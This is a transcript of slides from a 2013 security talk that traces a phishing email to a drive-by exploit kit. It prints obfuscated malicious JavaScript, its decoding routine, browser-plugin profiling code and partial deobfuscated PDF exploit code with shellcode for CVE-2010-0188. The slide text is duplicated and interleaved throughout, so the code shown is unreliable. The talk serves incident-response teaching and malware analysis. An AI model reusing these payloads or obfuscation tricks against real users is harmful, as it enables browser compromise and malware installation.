• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Analysing Phishing & Malware Attacks for Neither Fun nor Profit
 

Analysing Phishing & Malware Attacks for Neither Fun nor Profit

on

  • 259 views

Slides to accompany my talk given to TASK.to on 25th Sept 2013.

Slides to accompany my talk given to TASK.to on 25th Sept 2013.

I discuss tracking an attempted

Statistics

Views

Total Views
259
Views on SlideShare
259
Embed Views
0

Actions

Likes
0
Downloads
8
Comments
0

0 Embeds 0

No embeds

Accessibility

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

CC Attribution-NonCommercial LicenseCC Attribution-NonCommercial License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • `

Analysing Phishing & Malware Attacks for Neither Fun nor Profit Analysing Phishing & Malware Attacks for Neither Fun nor Profit Presentation Transcript

  • Analyzing Phishing & MalwareAnalyzing Phishing & Malware Attacks For Neither Fun Nor ProfitAttacks For Neither Fun Nor Profit Lee BrotherstonLee Brotherston @leEb_public@leEb_public
  • Obligatory “where I work” slideObligatory “where I work” slide
  • IntroductionIntroduction • What is meant by Malware & Phishing?What is meant by Malware & Phishing? • Responding with Malware & Phishing?Responding with Malware & Phishing? • Case study + bonus tangentsCase study + bonus tangents • QuestionsQuestions
  • Malware Response StepsMalware Response Steps During:During: • Assess if attack was successfulAssess if attack was successful • Assess impact to users/networkAssess impact to users/network • Contain & RemediateContain & Remediate Afterwards:Afterwards: • Examine what workedExamine what worked • Examine what failedExamine what failed • Improve processes, procedures & toolsImprove processes, procedures & tools
  • Anatomy of a phishAnatomy of a phish
  • Tangent #1 – Stanley MilgramTangent #1 – Stanley Milgram
  • Case Study - EmailCase Study - Email
  • Case Study – OPSECCase Study – OPSEC • Virtualised Environments (are not aVirtualised Environments (are not a panacea)panacea) • No, not a real browser….. No.No, not a real browser….. No. • wget, curl, nslookup, socat & telnet arewget, curl, nslookup, socat & telnet are your friendsyour friends (--user-agent=“…” is also your friend)(--user-agent=“…” is also your friend)
  • Case Study - RedirectionCase Study - Redirection curl --dump-header header.txtcurl --dump-header header.txt --user-agent "Mozilla/4.0 (compatible; MSIE--user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)“6.0; Windows NT 5.1; SV1)“ hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/
  • Case Study - RedirectionCase Study - Redirection <html><html> <title>Redirecting to ACH details, please<title>Redirecting to ACH details, please wait.....</title>wait.....</title> <script type="text/javascript"><script type="text/javascript"> <!--<!-- location.replace("hxxp://EVILMALWARESITE.COMlocation.replace("hxxp://EVILMALWARESITE.COM /ensure/bulletin-isolate.php");/ensure/bulletin-isolate.php"); //-->//--> </script></script> <noscript><noscript> <meta http-equiv="refresh" content="0;<meta http-equiv="refresh" content="0; url=hxxp://EVILMALWARESITE.COM/ensure/bullurl=hxxp://EVILMALWARESITE.COM/ensure/bull etin-isolate.php">etin-isolate.php"> </noscript></noscript>
  • Case Study – EvilMalwareSite.comCase Study – EvilMalwareSite.com <body><i></i><b><body><i></i><b> 59,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,3159,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,31 ,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116 ,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,10,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,10 4,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,74,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,7 6,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,8 6,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,1046,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,104 ,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,10,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,10 4,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,54,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,5 2,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,72,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,7 0,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,50,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,5 2,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,72,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,7 9,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,969,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,96 ,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,4,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,4 9,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,9,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108, 85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49, 111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70 ,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97, 109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,7109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,7 7,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,17,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,1 07,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,7407,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,74 ,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,9,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,9 7,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,7,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72, 105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97, 86,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,886,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,8 9,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69,9,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69, 120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,1120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,1 12,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,7512,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,75 ,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,11,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,11 6,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,16,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,1 07,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,7607,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,76 ,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,7,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,7 3,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,1183,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,118 ,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96 ,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,3,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,3 3,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,43,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,4 4,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,484,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,48 ,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,5,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,5 9,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,19,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,1 00,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,00,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33, 37,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,6137,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,61 </b></b> <script><script> try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"] (",");for(j=0;a["length"]>j;j++)(",");for(j=0;a["length"]>j;j++) {a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].ap{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].ap pendChild(d);d["innerHTML"]=a;}pendChild(d);d["innerHTML"]=a;}
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script><script> document.write('Hello World');document.write('Hello World'); </script></script>
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script><script> document.write('Heldocument.write('Hel'+''+'lo Wolo Wo'+''+'rld');rld'); </script></script>
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script><script> var naughty =var naughty = "document.write('Hel'+'lo Wo'+'rld');";"document.write('Hel'+'lo Wo'+'rld');"; eval(naughty);eval(naughty); </script></script>
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script><script> var encodedNaughty =var encodedNaughty = "646f63756d656e742e7772697465282748656c272b276c6f205"646f63756d656e742e7772697465282748656c272b276c6f205 76f272b27726c6427293b";76f272b27726c6427293b"; var naughty ='';var naughty =''; for (var i = 0; i < encodedNaughty.length; i += 2)for (var i = 0; i < encodedNaughty.length; i += 2) naughty +=naughty += String.fromCharCode(parseInt(encodedNaughty.substr(iString.fromCharCode(parseInt(encodedNaughty.substr(i , 2), 16));, 2), 16)); eval(naughty);eval(naughty); </script></script>
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script><script> varvar aa == "646f63756d656e742e7772697465282748656c272b276c6f205"646f63756d656e742e7772697465282748656c272b276c6f205 76f272b27726c6427293b";76f272b27726c6427293b"; varvar aaaa ='';=''; for (varfor (var aaaaaa = 0;= 0; aaaaaa << aa.length;.length; aaaaaa += 2)+= 2) aa +=aa += String.fromCharCode(parseInt(String.fromCharCode(parseInt(aa.substr(.substr(aaaaaa, 2), 16));, 2), 16)); eval(eval(aaaa);); </script></script>
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script><script> var a =var a = "646f63756d656e742e7772697465282748656c272b276c6f2"646f63756d656e742e7772697465282748656c272b276c6f2 0576f272b27726c6427293b";0576f272b27726c6427293b"; z=eval;z=eval; var aa ='';var aa =''; for (var aaa = 0; aaa < a.length; aaa += 2)for (var aaa = 0; aaa < a.length; aaa += 2) aa += String.fromCharCode(parseInt(a.substr(aaa,aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));2), 16)); z(aa);z(aa); </script></script>
  • Tangent #2 - ObfuscationTangent #2 - Obfuscation <script>var<script>var a="646f63756d656e742e7772697465282748656c272b276c6f2a="646f63756d656e742e7772697465282748656c272b276c6f2 0576f272b27726c6427293b";z=eval;var aa='';for (var0576f272b27726c6427293b";z=eval;var aa='';for (var aaa=0;aaa<a.length;aaa+=aaa=0;aaa<a.length;aaa+= 2)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),12)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),1 6));z(aa);</script>6));z(aa);</script> ==== <script><script> document.write('Hello World');document.write('Hello World'); </script></script>
  • Deobfuscating Example - ReveloDeobfuscating Example - Revelo
  • Deobfuscating GK - ReveloDeobfuscating GK - Revelo
  • What Happened?What Happened?
  • Case StudyCase Study <script><script> try{document.body--}catch(dv32r3)try{document.body--}catch(dv32r3) {a=document[("getEl"+"ementsByTagName")]("b"){a=document[("getEl"+"ementsByTagName")]("b") [0].innerHTML["split"](",");for(j=0;a["length"]>j;j++)[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++) {a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(Strin{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(Strin g,a);d=document.createElement("span");document["body"].appendChg,a);d=document.createElement("span");document["body"].appendCh ild(d);d["innerHTML"]=a;}ild(d);d["innerHTML"]=a;} </script></script> <script><script> z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)z=eval;ss=String;function vq(){for(i=0;i<a.length;i++) {if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz() {dd=document;try{dd.body-=12}catch(xq){a=dd[gg]{dd=document;try{dd.body-=12}catch(xq){a=dd[gg] ("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));} </script></script> <script><script> s="";s=""; zzz();zzz(); az=1;try{caewbtew=~2;}catch(vava){az=0;}az=1;try{caewbtew=~2;}catch(vava){az=0;} vq();vq(); u=z;uu=s;u=z;uu=s; if(az)u(uu);if(az)u(uu); </script></script>
  • Case StudyCase Study <script><script> try {try { document.body--document.body-- } catch (dv32r3) {} catch (dv32r3) { a = documenta = document[("getEl" + "ementsByTagName")][("getEl" + "ementsByTagName")]("b")("b") [0].innerHTML["split"](",");[0].innerHTML["split"](","); for (j = 0; a["length"] > j; j++) {for (j = 0; a["length"] > j; j++) { a[j] = 1 + 0x1 * a[j];a[j] = 1 + 0x1 * a[j]; }} ff = "f";ff = "f"; a = String[ff + "romCharCode"a = String[ff + "romCharCode"].apply(String, a);].apply(String, a); d = document.createElement("span");d = document.createElement("span"); document["body"].appendChild(d);document["body"].appendChild(d); d["innerHTML"] = a;d["innerHTML"] = a; }} z = eval;z = eval; ss = String;ss = String; function vq() {function vq() { . . . . . . . . .. . . . . . . . .
  • Case Study – Quick & DirtyCase Study – Quick & Dirty Deobfuscate…Deobfuscate… z = eval;z = eval; u = z;u = z; if (az) u(uu);if (az) u(uu); u = eval uu = decoded scriptu = eval uu = decoded script if(az)if(az) document.write('<code>'+document.write('<code>'+uuuu+'</code>'+'</code>' ););
  • Et Voila!Et Voila! pdpd={version:"0.7.9",name:"pdpdpdpd={version:"0.7.9",name:"pdpd ",handler:function(c,b,a)",handler:function(c,b,a) {return function(){return function() {c(b,a)}},openTag:"<",isDefine{c(b,a)}},openTag:"<",isDefine d:function(b){return typeof b!d:function(b){return typeof b! ="undefined"},isArray:function="undefined"},isArray:function (b)(b) {return(/array/i).test(Object.{return(/array/i).test(Object. prototype.toString.call(b))},iprototype.toString.call(b))},i sFunc:function(b)sFunc:function(b)
  • Edited HighlightsEdited Highlights flash: {flash: { mimeType: "application/x-shockwave-mimeType: "application/x-shockwave- flash",flash", progID: "ShockwaveFlash.ShockwaveFlash",progID: "ShockwaveFlash.ShockwaveFlash", classID: "clsid:D27CDB6E-AE6D-11CF-96B8-classID: "clsid:D27CDB6E-AE6D-11CF-96B8- 444553540000",444553540000", getVersion: function () {getVersion: function () { adobereader: {adobereader: { mimeType: "application/pdf",mimeType: "application/pdf", java: {java: { mimeType: ["application/x-java-mimeType: ["application/x-java- applet", "application/x-java-vm",applet", "application/x-java-vm", "application/x-java-bean"],"application/x-java-bean"],
  • Socat - the quick (cheats) waySocat - the quick (cheats) way $ socat TCP4-LISTEN:8080 –$ socat TCP4-LISTEN:8080 – GETGET http://EVILMALWARESITE.COM/ensure/bulletinhttp://EVILMALWARESITE.COM/ensure/bulletin -isolate.php?jnlp=7dff3c2e22-isolate.php?jnlp=7dff3c2e22 HTTP/1.1HTTP/1.1 accept-encoding: gzipaccept-encoding: gzip Host: evilmalwaresite.comHost: evilmalwaresite.com Cache-Control: no-cacheCache-Control: no-cache Pragma: no-cachePragma: no-cache User-Agent: Mozilla/4.0 (Windows XP 5.1)User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21Java/1.6.0_21 Accept: text/html, image/gif, image/jpeg, *;Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2q=.2, */*; q=.2 Proxy-Connection: keep-aliveProxy-Connection: keep-alive
  • Case Study – Summary so farCase Study – Summary so far • RedirectsRedirects • Obtains obfuscated scriptObtains obfuscated script • De-obfuscates scriptDe-obfuscates script • Profiles the browser (which browser,Profiles the browser (which browser, ActiveX, Flash, Java, MediaPlayer plugins,ActiveX, Flash, Java, MediaPlayer plugins, Acrobat Reader, etc)Acrobat Reader, etc) • Collects versions & configuration of theCollects versions & configuration of the pluginsplugins • Rewrites the current pageRewrites the current page • Embeds the payload (PDF)Embeds the payload (PDF)
  • Case Study – AntiVirusCase Study – AntiVirus
  • Case Study – PayloadCase Study – Payload • VirusTotalVirusTotal –LibTiff Integer OverflowLibTiff Integer Overflow –PDF:Exploit.PDF-JS.AAHPDF:Exploit.PDF-JS.AAH –PDF/Blacole-FHJ!811825B7A717PDF/Blacole-FHJ!811825B7A717 –Exploit:Win32/CVE-2010-0188Exploit:Win32/CVE-2010-0188
  • Case Study – PayloadCase Study – Payload • Malware Tracker:Malware Tracker: – 111.0@4334: suspicious.javascript in XFA111.0@4334: suspicious.javascript in XFA blockblock – 111.0@4334: suspicious.warning: object111.0@4334: suspicious.warning: object contains JavaScriptcontains JavaScript • Let’s extract the XFA blockLet’s extract the XFA block
  • MalwareScanner - XFAMalwareScanner - XFA
  • XFA Block – here we go again!XFA Block – here we go again! <script contentType='application/x-<script contentType='application/x- javascript'>javascript'> if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageFiel d1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0) {x='eI';zz="y";z=event&#46;target;}{x='eI';zz="y";z=event&#46;target;} xs="x65";xs="x65"; dd="Co"+"de";dd="Co"+"de"; ddd="ar";ddd="ar"; s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@"; xx=s[2].concat('a',"l");xx=s[2].concat('a',"l");
  • XFA Block - ObfuscationXFA Block - Obfuscation s=caca="ntvs=caca="ntvttdhfePJxTmlNo#hFpx!ZeA*yvv#@";dhfePJxTmlNo#hFpx!ZeA*yvv#@"; String["fr"['cString["fr"['c'+''+'oo'+"'+"nca"+s[3]]…nca"+s[3]]… String["fr"['conca'+String["fr"['conca'+s[3]]s[3]]…… String["fr"['concat']…String["fr"['concat']…
  • XFA Block – ObfuscationXFA Block – Obfuscation function ZZA(){return 2-function ZZA(){return 2- 2;}2;} sq=z[xs+xx]sq=z[xs+xx] xs="x65";xs="x65"; xx=s[2].concat('a',"l");xx=s[2].concat('a',"l"); sq=eval;sq=eval; Hex “e”Hex “e” s[2] = “v”s[2] = “v”
  • XFA Block - ObfuscationXFA Block - Obfuscation if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageFiel d1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0) {x='eI';zz="y";z=event&#46;target;}{x='eI';zz="y";z=event&#46;target;} ==== if(1){x='eI';zz="y";z=event&#46;target;}if(1){x='eI';zz="y";z=event&#46;target;} OrOr if(0){x='eI';zz="y";z=event&#46;target;}if(0){x='eI';zz="y";z=event&#46;target;}
  • XFA Block – Just Won’t RunXFA Block – Just Won’t Run z=event&#46;target; <- Makes IE Barf &#46; == . z=event.target;
  • XFA Block - ObfuscationXFA Block - Obfuscation a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZAa=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA (('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA((' 6'),04),ZA(('6'),04),ZA(('6'),011)6'),04),ZA(('6'),04),ZA(('6'),011)………… function ZA(a,b) {function ZA(a,b) { a+=b;a+=b; sq=z[xs+xx]("x70ar"+"s"+x+s[0]+s[1]);sq=z[xs+xx]("x70ar"+"s"+x+s[0]+s[1]); return sq(a,16);return sq(a,16); }}
  • Let’s try some guessworkLet’s try some guesswork function ZA(a,b){function ZA(a,b){ a+=b;a+=b; document.write(String.fromCharCode(parseInt(a, 16)));document.write(String.fromCharCode(parseInt(a, 16))); }} ZA(('7'),06)ZA(('7'),06) ZA(('6'),01)ZA(('6'),01) ZA(('7'),02)ZA(('7'),02) ZA(('2'),00)ZA(('2'),00) ZA(('7'),00)ZA(('7'),00) ZA(('6'),01)ZA(('6'),01) ZA(('6'),04)ZA(('6'),04) ZA(('6'),04)ZA(('6'),04) ZA((‘6’),011)ZA((‘6’),011) ZA((‘6’),E)ZA((‘6’),E) ZA((‘6’),7)ZA((‘6’),7) Hex 76 == ‘v’Hex 76 == ‘v’ Hex 61 == ‘a’Hex 61 == ‘a’ Hex 72 == ‘r’Hex 72 == ‘r’ Hex 20 == SpaceHex 20 == Space Hex 70 == ‘p’Hex 70 == ‘p’ Hex 61 == ‘a’Hex 61 == ‘a’ Hex 64 == ‘d’Hex 64 == ‘d’ Hex 64 == ‘d’Hex 64 == ‘d’ ???????? Hex 6E == ‘n’Hex 6E == ‘n’ Hex 67 == ‘g’Hex 67 == ‘g’ ‘‘i’ == Hex 69i’ == Hex 69 Octal 011 == Hex 9Octal 011 == Hex 9
  • That seemed to work! (mostly)That seemed to work! (mostly) var padding;var padding; var bbb, ccc, ddd, eee, fff, ggg, hhh;var bbb, ccc, ddd, eee, fff, ggg, hhh; var pointers_a, i;var pointers_a, i; var x = new Array();var x = new Array(); var y = new Array();var y = new Array(); var _l1 =var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a414141"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a414141 41260000000000000000000000000000001239804a6420600f000400004141441260000000000000000000000000000001239804a6420600f0004000041414 14141414141" + ".split('').reverse().join('').replace(/;/g,14141414141" + ".split('').reverse().join('').replace(/;/g, '');''); _l3 = app;_l3 = app; _l4 = new Array();_l4 = new Array(); function _l5() {function _l5() { var _l6 = _l3.viewerVersion.toString();var _l6 = _l3.viewerVersion.toString(); _l6 = _l6.replace('.', '');_l6 = _l6.replace('.', ''); while (_l6.length < 4) _l6 += '0';while (_l6.length < 4) _l6 += '0'; return parseInt(_l6, 10)return parseInt(_l6, 10) }} function _l7(_l8, _l9) {function _l7(_l8, _l9) { while (_l8.length * 2 < _l9) _l8 += _l8;while (_l8.length * 2 < _l9) _l8 += _l8; return _l8.substring(0, _l9 / 2)return _l8.substring(0, _l9 / 2) ……..
  • Exploit Code – ObservationsExploit Code – Observations • No real obfuscation • No fake functions, variables or other distractions. • Nearly all string manipulation.
  • Exploit - SamplesExploit - Samples var padding; var pointers_a, i; loxWhee = _I1 + spray; ImageField1.rawValue = _ll1
  • Case Study – PayloadCase Study – Payload • Uses a LibTiff OverflowUses a LibTiff Overflow • Executes arbitrary code, which…Executes arbitrary code, which… • Downloads an executes .dll of attackersDownloads an executes .dll of attackers choice…choice… Game OverGame Over
